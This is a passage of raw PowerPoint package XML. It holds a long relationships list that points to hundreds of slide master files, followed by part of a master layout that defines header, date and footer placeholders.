Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster277.xml"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster276.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster275.xml"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster274.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster273.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster272.xml"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster271.xml"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster270.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster269.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster26.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster268.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster267.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster266.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster265.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster264.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster263.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster262.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster261.xml"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster260.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster259.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster25.xml"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster258.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster257.xml"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster256.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster255.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster254.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster253.xml"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster252.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster251.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster250.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster249.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster24.xml"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster248.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster247.xml"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster246.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster245.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster244.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster243.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster242.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster241.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster240.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster239.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster23.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster238.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster237.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster236.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster235.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster234.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster233.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster232.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster231.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster230.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster229.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster22.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster228.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster227.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster226.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster225.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster224.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster223.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster222.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster221.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster220.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster219.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster21.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster218.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster217.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster216.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster215.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster214.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster213.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster212.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster211.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster210.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster209.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster20.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster208.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster207.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster206.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster205.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster204.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster203.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster202.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster201.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster200.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster199.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster19.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster198.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster197.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster196.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster195.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster194.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster193.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster192.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster191.xml"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster190.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster189.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster18.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster188.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster187.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster186.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster185.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster184.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster183.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster182.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster181.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster180.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster179.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster17.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster178.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster177.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster176.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster175.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster174.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster173.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster172.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster171.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster170.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster169.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster16.xml"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster168.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster167.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster166.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster165.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster164.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster163.xml"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster162.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster161.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster160.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster159.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster15.xml"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster158.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster157.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster156.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster155.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster154.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster153.xml"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster152.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster151.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster150.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster149.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster14.xml"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster148.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster147.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster146.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster145.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster144.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster143.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster142.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster141.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster140.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster139.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster13.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster138.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster137.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster136.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster135.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster134.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster133.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster132.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster131.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster130.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster129.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster12.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster128.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster127.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster126.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster125.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster124.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster123.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster122.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster121.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster120.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster119.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster11.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster118.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster117.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster116.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster115.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster114.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster113.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster112.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster111.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster110.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster109.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster10.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster108.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster107.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster106.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster105.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster104.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster103.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster102.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster101.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster100.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster99.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/></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288.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页眉占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3078290" cy="513492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1245"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023812" y="0"/>
            <a:ext cx="3078290" cy="513492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1245"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0F9B84EA-7D68-4D60-9CB1-D50884785D1C}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9720804"/>
            <a:ext cx="3078290" cy="513491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
